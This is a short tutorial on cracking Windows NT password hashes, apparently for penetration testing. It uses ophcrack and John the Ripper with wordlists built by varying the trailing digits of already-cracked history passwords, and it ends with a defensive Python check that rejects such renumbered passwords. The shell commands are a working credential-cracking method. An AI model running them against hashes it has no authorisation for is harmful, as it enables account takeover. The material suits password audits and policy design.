# Attacking user behaviour as a consequence of forced regular password change

Let's assume we are using [ophcrack](https://ophcrack.sourceforge.io/) to crack NT hashes in pwdump format, where the pwdump also includes the password-history hashes. Assume we have already cracked several of the history hashes.

Steps for getting more passwords cracked (assuming that, on each policy-forced password change, users just increase, decrease or otherwise edit the digits at the end of their passwords):

1. Get cracked passwords (including history):

```bash
grep -v ':::$' ophcrack.pwdump | awk -F: '{ print $7 }' | sort -u > wordlist_ophcracked.txt
```

2. Feed it to [john](https://www.openwall.com/john/):

```bash
john secretsdump.ntds.pwdump --format=nt --wordlist=wordlist_ophcracked.txt
```

3. Strip the numbers at the ending:

```bash
sed -e 's/[0-9]*$//' wordlist_ophcracked.txt | sort -u > wordlist_ophcracked_base.txt
```

4. Generate some common patterns (feel free to include more):

```bash
for i in $(seq 1 1000) ; do echo "$i" ; done > num_1.txt
for i in $(seq 1 9999) ; do printf "%04d\n" "$i" ; done > num_2.txt
for i in $(seq 1 99) ; do printf "%02d\n" "$i" ; done > num_3.txt
for i in $(seq 1 365) ; do date --date "2000-01-01 +$i day" +'%m%d' ; done > num_4.txt

cat num_*.txt | sort -u > num.txt
```

5. Combine the number patterns with the base words (could be slow, but at least it is a one-liner :) ):

```bash
while read -r w ; do while read -r n ; do echo "$w$n" ; done < num.txt ; done < wordlist_ophcracked_base.txt > wordlist_ophcracked_combined.txt
```

6. Attack the hashes with the combined wordlist:

```bash
john secretsdump.ntds.pwdump --format=nt --wordlist=wordlist_ophcracked_combined.txt
```

The result should include many more cracked passwords: not only history entries, but active passwords as well.
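The same habit this procedure relies on (keeping the word and only editing the trailing digits) is easy to reject at password-change time, and easy to measure in a password audit. The following Python check is an added example, not part of the original post; the function names and the sample history are constructed.

```python
import re
from typing import Optional

# Trailing run of digits that users typically bump on each forced change.
TRAILING_DIGITS = re.compile(r"[0-9]+$")


def base_of(password: str) -> str:
    """Strip the trailing digits and case-fold, so 'Winter2023' -> 'winter'.

    An all-digit password has no base; keep it whole so '1234' and '9999'
    are not treated as the same word (a digits-only rule belongs elsewhere).
    """
    base = TRAILING_DIGITS.sub("", password)
    return (base if base else password).casefold()


def reuses_base(candidate: str, previous: str) -> bool:
    """True if candidate is previous with only its trailing digits edited."""
    return base_of(candidate) == base_of(previous)


def check_against_history(candidate: str, history: list[str]) -> Optional[str]:
    """Return a rejection reason if candidate merely re-numbers any history
    entry, otherwise None. Written for a change-time filter that sees the
    cleartext candidate; the history is cleartext here for illustration."""
    for idx, old in enumerate(history):
        if reuses_base(candidate, old):
            return f"only trailing digits differ from history entry {idx}"
    return None


def count_renumbered_changes(history: list[str]) -> int:
    """Audit helper: count consecutive changes (oldest first) that only
    altered trailing digits, to measure how widespread the habit is."""
    return sum(reuses_base(new, old) for old, new in zip(history, history[1:]))


if __name__ == "__main__":
    # Constructed sample history for one account, oldest first.
    sample_history = ["Summer2023", "Summer2024", "Autumn2024", "Autumn25"]
    print(check_against_history("Autumn2026", sample_history))
    print(check_against_history("Spring2026", sample_history))
    print(count_renumbered_changes(sample_history))
```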

That's all about the effect of policy-forced password changes on user behaviour.